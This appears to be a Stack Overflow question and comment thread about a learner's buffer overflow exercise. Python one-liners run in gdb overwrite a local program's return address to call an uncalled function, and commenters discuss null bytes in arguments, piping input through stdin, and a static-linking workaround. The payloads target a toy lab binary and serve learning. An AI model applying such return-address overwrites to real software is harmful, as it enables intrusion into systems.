# Bufferoverflow example address

Tags: python, c, buffer-overflow

I am using buffer overflow to overwrite the return address and calls another function. The name of function I call by overwriting the return address is `not_called`. Here is how I create the payload

```
(gdb) r $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x3b\x42\x08\x08")')
```

The program works in the above case and `not_called` function is called. The problem arises when address of `not_called` is in this format : `0x57d`.
When I create payload as follows :

```
(gdb) r $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x7d\x05\x00\x00")')
```

I get the following error and program won't work.

```
(gdb) r $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x7d\x05\x00\x00")')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/aditya/Desktop/victim $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x7d\x05\x00\x00")')
/bin/bash: warning: command substitution: ignored null byte in input
0xffffd07c

Program received signal SIGSEGV, Segmentation fault.
0x5600057d in ?? ()
```

I have two questions:

- Is `bash` warning ignoring the bytes 0,0 and not passing them?
- Second, IF you look at address at SIGSEV, it is `0x5600057d`, it should have been `0x0000057d`.

How can I create such an address ?

**Update** :
A little hack if someone just wants to experiment or do homework, do static linking (gcc -static) with `stdlib.h` `string.h` `stdio.h` . It will increase your program size. When you disassembe it, it's address will be large enough. There is no general solution to the problem. You can see this post at [Security Stackexchange](https://security.stackexchange.com/questions/234289/buffer-overflow-with-zeros)

Comment: Bash uses C-style null-terminated strings as command-line arguments, so you can't have null bytes in the arguments. This is why exploits use stdin, not arguments.

Comment: @Barmar  How do I pass this payload ? I can use `gets`. I know I can store it in a file and use pipe. But what do I do inside `gdb` ?

Comment: https://stackoverflow.com/questions/8422259/gdb-debugging-with-piped-input-not-arguments

Comment: `r < filename` or `r < <(python -c ...)`

Comment: @Barmar  Same issue. I still get the address 0x5600057d

Comment: Sounds like an endianness problem, or you're not writing the correct number of bytes before `"\x7d\x05\x00\x00"`

Comment: If the first 2 bytes of address are not zero, the program works correctly. If the address is 0x565555ad, the program is going to the `not_called` function when I do "\xad\x55\x55\x56".

Comment: Could python `sys.stdout.write`  stop at the first null byte ?

Comment: No, Python doesn't care about null bytes. And if it did, you wouldn't have gotten the bash error about null bytes being ignored.

Comment: @Barmar I'm not a python SME, however it seems that for binary stream it's `sys.stdout.buffer.write(b"")`  ?

Comment: I"m not sure it will make a difference, but can't hurt to try.

Comment: @Zilog80 Nope. Did not work

Comment: @Barmar you are correct, there is no way to do so. I finally did static linking with `stdlib.h`  `string.h` and `stdlib.h` to increase program size. Now the address of `not_called` is large because so many libraries have been included above it . I thing you should write your comment as an answer so it is clear to anyone in future.